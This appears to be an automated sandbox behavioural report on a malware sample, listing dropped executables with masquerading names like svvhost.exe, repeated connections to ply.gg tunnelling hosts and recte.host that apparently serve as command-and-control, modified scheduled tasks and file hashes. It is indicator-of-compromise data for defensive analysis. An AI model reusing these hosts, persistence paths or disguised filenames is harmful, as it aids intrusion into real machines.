"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.5.2100969568\646837057" -childID 4 -isForBrowser -prefsHandle 4936 -prefMapHandle 4952 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9342e130-22af-4a3a-bed5-febb351a7134} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 4932 27d63b6ab58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.6.1878075749\761246163" -childID 5 -isForBrowser -prefsHandle 4960 -prefMapHandle 4956 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {10aa32d8-ed96-4486-bb96-3497cbc43854} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 2808 27d7d925558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.7.794327305\550752595" -childID 6 -isForBrowser -prefsHandle 5204 -prefMapHandle 5208 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7499bac-cd39-45d3-b2c8-8affa8bd7530} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 5292 27d7d926158 tab
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.238.32.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | recte.host | udp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.23.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 147.185.221.19:25944 | tcp | |
| US | 147.185.221.19:42571 | tcp | |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.19:38630 | tcp | |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | teen-modes.gl.at.ply.gg | udp |
| US | 147.185.221.19:23638 | teen-modes.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | politics-fiber.gl.at.ply.gg | udp |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
| US | 13.107.253.67:443 | tcp | |
| US | 147.185.221.19:25944 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | politics-fiber.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | san-periods.gl.at.ply.gg | udp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:23638 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 44.237.98.207:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | 166.188.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.98.237.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 73.239.69.13.in-addr.arpa | udp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 172.217.169.42:443 | chromewebstore.googleapis.com | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| FR | 23.200.87.12:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | 12.87.200.23.in-addr.arpa | udp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r4---sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | r4.sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.169:443 | r4.sn-aigl6ney.gvt1.com | tcp |
| US | 8.8.8.8:53 | r4.sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.169:443 | r4.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | 169.183.194.173.in-addr.arpa | udp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
Files
memory/4284-0-0x0000000074ADE000-0x0000000074ADF000-memory.dmp
memory/4284-1-0x0000000000440000-0x0000000000466000-memory.dmp
C:\Users\Admin\yar.exe
| MD5 | 9e8baf127b832943d4fae218ce90191a |
| SHA1 | 449e6f1c2c79cb0ee4d43151bcaa6ecfd38efa70 |
| SHA256 | fbbb58d64ed3d52ebf0c4442588f4a19e48fd64023188fb750926b13c40df8a0 |
| SHA512 | 9af9e3e30c34ecad41277c0bb8e27eabaf7fa05249153ffac20262af4ed3680a5a85cc5c192b04b3da3835396ef68e4e4a8b9123c663d8cf2f3a8681db7f8114 |
memory/5040-5-0x00007FFFD63F3000-0x00007FFFD63F5000-memory.dmp
memory/5040-6-0x0000000000990000-0x00000000009C8000-memory.dmp
memory/5040-7-0x0000000002B20000-0x0000000002B26000-memory.dmp
C:\Users\Admin\sachost.exe
| MD5 | 7a9290dfef391b53b114a8ddea1a7675 |
| SHA1 | b6a0047be861becb45d8868beffafb1216f6243a |
| SHA256 | 33b848f9b1ea8ec2f27da181512df79d9e65e2e8c814f1df29945d19d60708dc |
| SHA512 | 9a7f349698014256e950a81f42b9c9b20d25312a7310e914f9cebc553e872d23f1d14d802c656cde4867f93e1621e999f3a283ce01263fa567f2e41a36185d49 |
memory/4632-11-0x0000000000DE0000-0x0000000000E26000-memory.dmp
memory/4632-12-0x00000000015C0000-0x00000000015C6000-memory.dmp
C:\Users\Admin\penisware.exe
| MD5 | 69d8b4e23e8772c8509e2f2d96d13d1e |
| SHA1 | c29c85bd8c58b6b9aa3266763b3c5358d402d6ba |
| SHA256 | c8bd8c0e90372507183037207e67c54129f7eec6a3596ff26cf13cee98dd865b |
| SHA512 | 7a5e39123f08c2bf521dbb31bd4c1ddb1a94d7dba26c31138ca071dc6d589dcf960e9e5cd691723703ab9939cf1abe73ef33b201019c8140d339ee7bcb1b4e6c |
memory/2276-17-0x0000000000DC0000-0x0000000000DF6000-memory.dmp
memory/2276-18-0x0000000002E50000-0x0000000002E56000-memory.dmp
C:\Users\Admin\penisballs.exe
| MD5 | 18f497deffe88b6b2cff336a277aface |
| SHA1 | 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e |
| SHA256 | 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5 |
| SHA512 | 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d |
memory/5108-22-0x0000000000690000-0x00000000006D6000-memory.dmp
memory/5108-23-0x0000000002740000-0x0000000002746000-memory.dmp
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
C:\Users\Admin\physics.exe
| MD5 | 7849154210d0e788d25f4f195438c765 |
| SHA1 | 93018c5de438c48a4d890071352b60b81952fe17 |
| SHA256 | 8ba1d2d467e3d78a65a238e592a81d6a518737bc077e39dd162cffc76ee18441 |
| SHA512 | bdc70b6615c794c222eb8f5004f0ed5a78062c282f8938556b514bf77bab79724a3a6a621672ba2d97fbbf1567bdc249ab6adb918ae5f2945e45b5d32f85a1d2 |
memory/3880-28-0x0000000000A20000-0x0000000000A66000-memory.dmp
memory/3880-29-0x0000000001210000-0x0000000001216000-memory.dmp
C:\Users\Admin\calc.exe
| MD5 | 8cc75bff0675c5c55483b206666b9dd3 |
| SHA1 | 218198bfd494e31db303e55d41c110564835f0e3 |
| SHA256 | 1a7b62006c6db37c873401724d0303fc789f2422bc7c1878f6dd5379f340d607 |
| SHA512 | 0a6930caacdbf2003b29a12b0e8db682223800f285b1b8428cf29d00439d7ab7299d96dde9ae12e2121be1f6b4bb10a7a1477e759457ef7c85650784cc911879 |
memory/4136-37-0x0000000000590000-0x00000000005A0000-memory.dmp
C:\Users\Admin\install.exe
| MD5 | 1a7d1b5d24ba30c4d3d5502295ab5e89 |
| SHA1 | 2d5e69cf335605ba0a61f0bbecbea6fc06a42563 |
| SHA256 | b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5 |
| SHA512 | 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa |
C:\Windows\Temp\__PSScriptPolicyTest_f3o103k1.q4v.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3068-51-0x000001FF454D0000-0x000001FF454F2000-memory.dmp
memory/3068-53-0x000001FF45880000-0x000001FF458AA000-memory.dmp
memory/3068-55-0x00007FFFF5DE0000-0x00007FFFF5E9E000-memory.dmp
memory/3068-54-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp
memory/3012-61-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3012-59-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3012-58-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3012-57-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3012-56-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3012-65-0x00007FFFF5DE0000-0x00007FFFF5E9E000-memory.dmp
memory/3012-64-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp
memory/3068-66-0x000001FF45500000-0x000001FF4564E000-memory.dmp
memory/632-71-0x00000179AA250000-0x00000179AA27B000-memory.dmp
memory/688-90-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp
memory/688-83-0x0000022D3C4F0000-0x0000022D3C51B000-memory.dmp
memory/380-105-0x0000022757B10000-0x0000022757B3B000-memory.dmp
memory/396-116-0x000002784A170000-0x000002784A19B000-memory.dmp
memory/380-112-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp
memory/380-111-0x0000022757B10000-0x0000022757B3B000-memory.dmp
memory/976-101-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp
memory/976-100-0x00000204B25A0000-0x00000204B25CB000-memory.dmp
memory/976-94-0x00000204B25A0000-0x00000204B25CB000-memory.dmp
memory/632-79-0x00007FFFB6D30000-0x00007FFFB6D40000-memory.dmp
memory/632-78-0x00000179AA250000-0x00000179AA27B000-memory.dmp
memory/632-72-0x00000179AA250000-0x00000179AA27B000-memory.dmp
memory/632-70-0x00000179AA1F0000-0x00000179AA215000-memory.dmp
memory/688-89-0x0000022D3C4F0000-0x0000022D3C51B000-memory.dmp
memory/3012-67-0x0000000140000000-0x0000000140008000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
memory/5108-954-0x000000001CD30000-0x000000001CDA6000-memory.dmp
memory/5040-958-0x00007FFFD63F3000-0x00007FFFD63F5000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7DF.tmp.csv
| MD5 | 7cfa6859d175bfbd0f39171939ee483d |
| SHA1 | cddceea7249a8a3d6cd749f7bb2217742dae5482 |
| SHA256 | 955cc2a84d1e9bc0ccc6e09dda465ac6521aede4b970c1bb364976db828f5a6f |
| SHA512 | 9c2f159390027c2a7673c92c568973e5d67b6bcf4d0cba448d18d97dc200b2cb8837c16caa06ed78efcd067aa860dcad7a2ac0066be7089d20e3a3e52f66fd3d |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC83E.tmp.txt
| MD5 | 26e96215aa9b5a2a005871fdbfdb1324 |
| SHA1 | bf3701aad15d8950514b1caaa06639c53d87930f |
| SHA256 | c1cd63d6ebfb5f58eb21157db8980433fe673bd090d791e530b6fead6ffb99e9 |
| SHA512 | b9d063ece3b0d210609f57d1f1e7be86faf09c15c332862891796b083d6328a8876d4c5bfd87c7d22aa6794997ae172755110d1adbabc55d135dedd53376a471 |
memory/5792-1061-0x0000000000B90000-0x0000000000BC8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | d9531ccb17e4d36b0055157a51bc3762 |
| SHA1 | b88b8a76e55398d418e6ce55bc924e36812400f3 |
| SHA256 | d7cdf4a3b94730e1e3149381e6e59f469e2140526e5dc73ee1635160f4b3c7df |
| SHA512 | 5d06bd8dd82ad6bff41412d9f458344eecb9cadcb76743c530705bc4968dd6a760a1eec427b6d4d1346bab591f11610db5757f49721df73a9195c29416314248 |
memory/5108-1102-0x000000001C570000-0x000000001C580000-memory.dmp
memory/5108-1104-0x000000001C620000-0x000000001C63E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\yar.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/2088-1144-0x0000000000550000-0x0000000000560000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin
| MD5 | dd5e716bab91e0829dfbf775c232946c |
| SHA1 | acd4ae489f709e11392b62c8153333fde88a2873 |
| SHA256 | 4dc1f486cfb4930e8c151b2ec1948c3da37170ffcb152599aae93a17428b1aca |
| SHA512 | e0338d7a32d2a72fb42ac2eccc58d014177a0bcf939f45b9780064834f761ef91806c0ae7298ad849d140178f8c7bf5e30ffbac819e6b9a0b2bbcabaca63aa5b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\379b990b-3dbf-4355-9398-f611ca4d9dbb
| MD5 | 0af6eeb6f9b0abd819589b34a56d6133 |
| SHA1 | eef79e6f8f2592f5c01a849c34e7a41020fd3367 |
| SHA256 | 78a4b04176c04eeb34222c748cfa3d406ce5289a1eaa611f6db8cf86a1c0c2fe |
| SHA512 | acd2ba44df314d3a50a21715bf7a835217d15ca1fd3ea91df4458f85e50f3d9b2f2f8ca9772cddb88b44ce90eed11480b8621af83770235b2b16fa53aacbd4bf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 89be356d888c71449da9a984cdec5aed |
| SHA1 | c4087fa6f50782eb9d4b4698a17f6d05479dcea1 |
| SHA256 | 0ccadc220da9907a5e52edb02a0fb729f979cccdec90122e9c431b33ebd45a86 |
| SHA512 | f07f8b3425a45742991dfb317f394340a08dc96dc4a7b5c5c757715fb35a5f96d90cb31a5d4588d0b5d3a8dff0168dd0d5927a2d80f4bcc8f4df747c28f50a29 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | a21e188ec9656e81174724cc5e4bdbce |
| SHA1 | c2775f0efe28c9ed08bc8a0a3030c07e98bd66a6 |
| SHA256 | a59f2ce2b7edc449711079f047c9b06917af89bf9b4a6c678c78111b417cba6d |
| SHA512 | 3db1fefae4edf14f23dfc2b18b231b80cdc6fe1e8e88766de75931a0ed005d40dee0d6eb6b8f230d3394b88ca52fda19c89bc9c2f495d7a57fcd43941777bd9a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | dd3b215776fe405e061249397d5ea22a |
| SHA1 | ad683ea30bca6d98d9a686d65c866eeb723144f8 |
